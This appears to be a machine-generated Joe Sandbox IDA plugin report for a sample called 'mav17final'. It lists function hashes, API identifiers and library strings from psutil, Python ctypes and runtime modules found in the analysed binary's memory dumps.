                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CreateErrorEventLast
                                                  • String ID: CreateEventW$LoadUpdateEvent$PdhAddEnglishCounterW failed$PdhCollectQueryDataEx failed$PdhOpenQueryW failed$RegisterWaitForSingleObject$\System\Processor Queue Length
                                                  • API String ID: 545576003-2079054072
                                                  • Opcode ID: c1cb49d9b83db92669efa6220550d7b029c16e342428b40d385d0b0f49376f49
                                                  • Instruction ID: d3cc2e3b9f5cccb6a937bc621cbef0c2888b854e51b929a1835bb936d5e79e7f
                                                  • Opcode Fuzzy Hash: c1cb49d9b83db92669efa6220550d7b029c16e342428b40d385d0b0f49376f49
                                                  • Instruction Fuzzy Hash: 78312C61A09A86C2EF10DF69E8441BA6BA1FFA87E4F844036DB4D87664DF3CE546C710
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: fprintf
                                                  • String ID: %s -> ERROR_NOACCESS$(is)$ReadProcessMemory$assume access denied (originated from %s)$psutil-debug [%s:%d]> $psutil/arch/windows/process_info.c
                                                  • API String ID: 383729395-1572680409
                                                  • Opcode ID: eea2a8f4a4062310805da43e97e10fd5ad741b3a1c6c4589939d84234f0c8799
                                                  • Instruction ID: 11c87dcf40ecf28ee24a5928230ae60de0a4a6dd5a99d0a1f97cf0689d2c9a4d
                                                  • Opcode Fuzzy Hash: eea2a8f4a4062310805da43e97e10fd5ad741b3a1c6c4589939d84234f0c8799
                                                  • Instruction Fuzzy Hash: F9314361A0CAC681EE51DF29E8553B967A0FFB87E4F804036DB4D476A6DE2CE147C710
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocObject_$Arg_AttrCallFromMethodParseTupleUnicode_Vectorcall
                                                  • String ID: OO!
                                                  • API String ID: 3012979734-3205451899
                                                  • Opcode ID: b86a9e6aec3d04f9dfe7387ee9b59cc105e28f1fb880d666b22fe7cdd29bfbaf
                                                  • Instruction ID: dbef322df1f981d4eba753f2f94b69ad5c6e0cb3e42a6662e9ae5ac5f91dd46a
                                                  • Opcode Fuzzy Hash: b86a9e6aec3d04f9dfe7387ee9b59cc105e28f1fb880d666b22fe7cdd29bfbaf
                                                  • Instruction Fuzzy Hash: DD213B32A09F8281EF448F29E8546786BA1EF4ABE2F186135DF4E47754EE3CE454D300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastOpenService$CloseHandleManager
                                                  • String ID: (originated from %s)$OpenSCManager$OpenService
                                                  • API String ID: 48634454-532727491
                                                  • Opcode ID: 84ab02473cebbfb869f4af948c1478c6e0cf08796c8f590fd933fbdfc8e87945
                                                  • Instruction ID: 684d4ca7334128e047bc342b59f524297aae0304f01fbd58c9ec177534c366e5
                                                  • Opcode Fuzzy Hash: 84ab02473cebbfb869f4af948c1478c6e0cf08796c8f590fd933fbdfc8e87945
                                                  • Instruction Fuzzy Hash: 9C216D51B1CACA82EE109F39A8543B92BA1BF6CBE4F804031DF0E46355EE2CE50B8740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Err_Mem_$AllocCharFormatUnicode_Wide
                                                  • String ID: String too long for BSTR$unicode string expected instead of %s instance
                                                  • API String ID: 920172908-178309214
                                                  • Opcode ID: cf6aaef1cfa7e26ad3eb861eb924d9a3e9377ee2f3586ae237e535f2c803a6dc
                                                  • Instruction ID: 3a0f8d5be9824b40b090db43e7e6325a78c14466f3751200f6b8654805ce30ec
                                                  • Opcode Fuzzy Hash: cf6aaef1cfa7e26ad3eb861eb924d9a3e9377ee2f3586ae237e535f2c803a6dc
                                                  • Instruction Fuzzy Hash: C8210966E09F8281EE948F59E8541796B62FF8AFE2F185035DB0E53724DE3CE4A5C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$DeallocString$Formatmemcpy
                                                  • String ID: byte string too long$bytes expected instead of %s instance$can't delete attribute
                                                  • API String ID: 1948958528-1866040848
                                                  • Opcode ID: fa96def4341ef930101010d25cc26409db7019c647d688fb077c539500109b12
                                                  • Instruction ID: 89be5c62ea4a14b76890ce3b39e7294a647934fb5219e7566d075047ebcc897b
                                                  • Opcode Fuzzy Hash: fa96def4341ef930101010d25cc26409db7019c647d688fb077c539500109b12
                                                  • Instruction Fuzzy Hash: 88212A62A08F8281EB508F2EE9401792760FF46BE6F14A132CB0E47765CF2DE485C301
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID:
                                                  • API String ID: 2943138195-0
                                                  • Opcode ID: ea53d01b8add9f065da6da89440d1b5514e5cb284af6834d09ce1e9fb4639f71
                                                  • Instruction ID: 6508fb74490612c4b62403dc10b5103dff495ddbcc7b8733762f465a371da95f
                                                  • Opcode Fuzzy Hash: ea53d01b8add9f065da6da89440d1b5514e5cb284af6834d09ce1e9fb4639f71
                                                  • Instruction Fuzzy Hash: 0D613762F29B6298FB00DBA8D8801EC37B1BB04B88F444476DF1D6BA99DF78E545D340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Mem_memmove$Bytes_DeallocFromMallocReallocSizeString
                                                  • String ID:
                                                  • API String ID: 1285943476-0
                                                  • Opcode ID: b1532046c9828cc468a7a84711bf2d79d67f1a2fff2fc6f6c5e67236e34e6897
                                                  • Instruction ID: 1c668fd5194f6456db4bf3595150f097842decb5724e3e583f5ffc1294ab75ff
                                                  • Opcode Fuzzy Hash: b1532046c9828cc468a7a84711bf2d79d67f1a2fff2fc6f6c5e67236e34e6897
                                                  • Instruction Fuzzy Hash: BE513422A19B8292EE558F2AA44423963B8FF44FC4F188435DF4D5BB68DF3CE45B9310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 211107550-393685449
                                                  • Opcode ID: 688fb15556d862c72de40c94a9225dad620afe04ad3ce9f2b8c9a53cb021efd3
                                                  • Instruction ID: 3c22a6e04508f665704cd7a5c34085ff236c29c10647959716741840135e1d72
                                                  • Opcode Fuzzy Hash: 688fb15556d862c72de40c94a9225dad620afe04ad3ce9f2b8c9a53cb021efd3
                                                  • Instruction Fuzzy Hash: 1AE19D72A08A828AEB249F38D4803AD7BA0FB44F98F154175DF8D57796CF38E585DB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc
                                                  • String ID: P$wrong type
                                                  • API String ID: 3617616757-281217272
                                                  • Opcode ID: e3327ad88a9a446218fbdf097499024a9865fdc2e91cfe0628b0646d4787f104
                                                  • Instruction ID: 519e3045958f1bce3aaa80ab281aabb8fe34c03ec857134fb0de40d515496021
                                                  • Opcode Fuzzy Hash: e3327ad88a9a446218fbdf097499024a9865fdc2e91cfe0628b0646d4787f104
                                                  • Instruction Fuzzy Hash: 6F716D61A0DBC681FA549F6DE85017927A1AF95BE3F186435CB4E473A6EF7CE800C350
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_ParseSizeTuple_$Err_Long_StringVoid$AttrAuditCallable_CheckObject_OccurredSequence_Sys_Tuple
                                                  • String ID: argument must be callable or integer function address$cannot construct instance of this class: no argtypes
                                                  • API String ID: 2570622991-2742191083
                                                  • Opcode ID: 540973c798f55e8bddb45151d9b86c5f877ff1e98a5e2c5b0f3278a9c8d95e1e
                                                  • Instruction ID: d5713908191c56626c00f4860fc6dff1bb7d0e9102781d22a3d862e8be95aca3
                                                  • Opcode Fuzzy Hash: 540973c798f55e8bddb45151d9b86c5f877ff1e98a5e2c5b0f3278a9c8d95e1e
                                                  • Instruction Fuzzy Hash: BE513921B09B8285EA548F5ED5842B937A0EF86FE6F18A031DF4E477A5EF2CE451C310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: __acrt_iob_func
                                                  • String ID: %d work, %d block, ratio %5.2f$ too repetitive; using fallback sorting algorithm$VUUU
                                                  • API String ID: 711238415-2988393112
                                                  • Opcode ID: 9108c4c4e2d6d5df63023b1ab5f74cbde5b98f3dbb4d4334f7fd8b373665a9e5
                                                  • Instruction ID: 2ef05a97885942f4166cbd8d168f755fd38c877495f827a7aac0f2ff39c2af27
                                                  • Opcode Fuzzy Hash: 9108c4c4e2d6d5df63023b1ab5f74cbde5b98f3dbb4d4334f7fd8b373665a9e5
                                                  • Instruction Fuzzy Hash: B3416E32A08A8287EA149F2D944516977B4FB98B94F101236DF4E53BA6DF3DE58BC600
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                  • API String ID: 2943138195-2239912363
                                                  • Opcode ID: e6d89d71e33ac373f0738e0b515b9d7d47b180a069a0d86b59b00a9470073de2
                                                  • Instruction ID: 87794ff222bfa7f26308d5dd503ae55155608e90e169b81d8674656d9682d510
                                                  • Opcode Fuzzy Hash: e6d89d71e33ac373f0738e0b515b9d7d47b180a069a0d86b59b00a9470073de2
                                                  • Instruction Fuzzy Hash: DA514C62E18B9698FB11CBA8D8412BD3BB0BF08B88F4481B5DF4D12B95DF7CA144E750
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Service$CloseConfig2ErrorHandleLastQuery
                                                  • String ID: QueryServiceConfig2W
                                                  • API String ID: 1882121732-608009358
                                                  • Opcode ID: 9112a224e2e793ec06f389caddcb9167c6d024421ef03c0fe177f940f9c403ab
                                                  • Instruction ID: 2b6c51dad916a087637dadf77fc8b765a82a6acf9fc21e1123999b70e17e7e99
                                                  • Opcode Fuzzy Hash: 9112a224e2e793ec06f389caddcb9167c6d024421ef03c0fe177f940f9c403ab
                                                  • Instruction Fuzzy Hash: 12413E21A1DAC682EE119F29E85416A7BA1FFA5BE0F441131EF4D43BA4EF7CE506C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073245464.00007FF8B9841000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B9840000, based on PE: true
                                                  • Associated: 00000002.00000002.2073221006.00007FF8B9840000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.2073274420.00007FF8B9843000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.2073310530.00007FF8B9845000.00000004.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.2073339457.00007FF8B9846000.00000002.00000001.01000000.00000009.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9840000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$DescriptorErr_FastFileObject_Sequence_String
                                                  • String ID: arguments 1-3 must be sequences$too many file descriptors in select()
                                                  • API String ID: 3320488554-3996108163
                                                  • Opcode ID: 05e470237c1967013c16db83c877e5144c843c525c657350500e77854bb128da
                                                  • Instruction ID: b7a3a5db239c75dd0935502f8e88f901d70a295a49c11a5aed60740bc3d9dfc4
                                                  • Opcode Fuzzy Hash: 05e470237c1967013c16db83c877e5144c843c525c657350500e77854bb128da
                                                  • Instruction Fuzzy Hash: 76417C32B09B8282EA149F19EA440397765FF94BE4F004236DB6E4B7A8DF3CE455C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CallDeallocObject_$FromFunctionLongLong_Traceback_
                                                  • String ID: GetResult$_ctypes/callproc.c
                                                  • API String ID: 2301701745-4166898048
                                                  • Opcode ID: 6b14f494761338040cbc18ac8ef32615b91be7de93a4bad4d1a784e7f6cbc817
                                                  • Instruction ID: 159b3db627a4d2c88eceb02e54e7a4254cb0ca142ed2b0d69b666f5ac67ca411
                                                  • Opcode Fuzzy Hash: 6b14f494761338040cbc18ac8ef32615b91be7de93a4bad4d1a784e7f6cbc817
                                                  • Instruction Fuzzy Hash: A8311E21E09BC382EE559F2DE91427927A0AF4ABE6F186534DF0E477A5DE3DE540C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleProcess$ErrorInfoLastMemoryOpen
                                                  • String ID: (kKKKKKKKKK)$OpenProcess$automatically set for PID 0
                                                  • API String ID: 3576067431-2652395995
                                                  • Opcode ID: c96220cb33b6c2f384865ab84d08a22d504b7e2c1e6550a0b9039a66c2826a71
                                                  • Instruction ID: 4015c4743318eafc00591e02c0af2a3ed5cc8cc189026c4b36bdf64e07902a8d
                                                  • Opcode Fuzzy Hash: c96220cb33b6c2f384865ab84d08a22d504b7e2c1e6550a0b9039a66c2826a71
                                                  • Instruction Fuzzy Hash: FF31CE21A0DBC681EE609F29E85437A6BA5FF98BE0F544136DB8D43765DF3CE4468B00
                                                  APIs
                                                  • PyObject_IsInstance.PYTHON311(?,?,00000000,00007FF8B9F66BCC), ref: 00007FF8B9F69D73
                                                  • PyObject_IsInstance.PYTHON311(?,?,00000000,00007FF8B9F66BCC), ref: 00007FF8B9F69DBB
                                                  • PyErr_Format.PYTHON311(?,?,00000000,00007FF8B9F66BCC), ref: 00007FF8B9F69E4D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: InstanceObject_$Err_Format
                                                  • String ID: ???$expected %s instance instead of %s$expected %s instance instead of pointer to %s
                                                  • API String ID: 215623467-1082101171
                                                  • Opcode ID: c42a85ef290f4f7c7dec54bd01f908c692fe1a4d2cba32a0c83425372474c043
                                                  • Instruction ID: 68106031ce67aa7258cda29d2a91a1810957cf5eb9edc33848178feedb4ee397
                                                  • Opcode Fuzzy Hash: c42a85ef290f4f7c7dec54bd01f908c692fe1a4d2cba32a0c83425372474c043
                                                  • Instruction Fuzzy Hash: 4F312B21A08BC281EA549F2AE9400796761EF45FF6F68A132DF9D477A5DF3CE885C310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleProcess$CountersErrorLastOpen
                                                  • String ID: (KKKKKK)$OpenProcess$automatically set for PID 0
                                                  • API String ID: 1257226484-302434769
                                                  • Opcode ID: 97ea4f020694c1f111b7326fa42d3f1f607de4d13a1e6d7b72fbfc24bec8e139
                                                  • Instruction ID: f95048cc5d507771d73aae651fba74d343d5f5fa5de23e14c8b9ec6b3ecef829
                                                  • Opcode Fuzzy Hash: 97ea4f020694c1f111b7326fa42d3f1f607de4d13a1e6d7b72fbfc24bec8e139
                                                  • Instruction Fuzzy Hash: DF310D61B08A8792FE609F29F8543796BA0FF68BE0F545035DB4D427A4EE2CE446C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: String$Bytes_Err_FromSizeThread_allocate_lockThread_free_lock
                                                  • String ID: Unable to allocate lock
                                                  • API String ID: 1127547223-3516605728
                                                  • Opcode ID: c17eff7bc98fcddad25fa0aa7e8872bdeafa31c641a1adeb9191edbd123e9819
                                                  • Instruction ID: c7aee2a8ffacfa59f06f5b868b0b9187a026e4a5e990d94736a45cfba27d5133
                                                  • Opcode Fuzzy Hash: c17eff7bc98fcddad25fa0aa7e8872bdeafa31c641a1adeb9191edbd123e9819
                                                  • Instruction Fuzzy Hash: D3310232A18A8296EF559F38E54837823B4FF54BD8F144235CB4E46699DF2CE88EC350
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$BuildDeallocFromLong_OccurredSsize_tStringTuple_Value
                                                  • String ID: not a ctypes type or object$siN
                                                  • API String ID: 1444022424-92050270
                                                  • Opcode ID: 26a9fcd1b49395e45c52150cf6bc8a8343daf74cdcd0b31558393dc906a49e26
                                                  • Instruction ID: 1bd3ae9aa296c1c1a9d99eb7272e5af5ade451976be47909e7dcf1f85ace9bcb
                                                  • Opcode Fuzzy Hash: 26a9fcd1b49395e45c52150cf6bc8a8343daf74cdcd0b31558393dc906a49e26
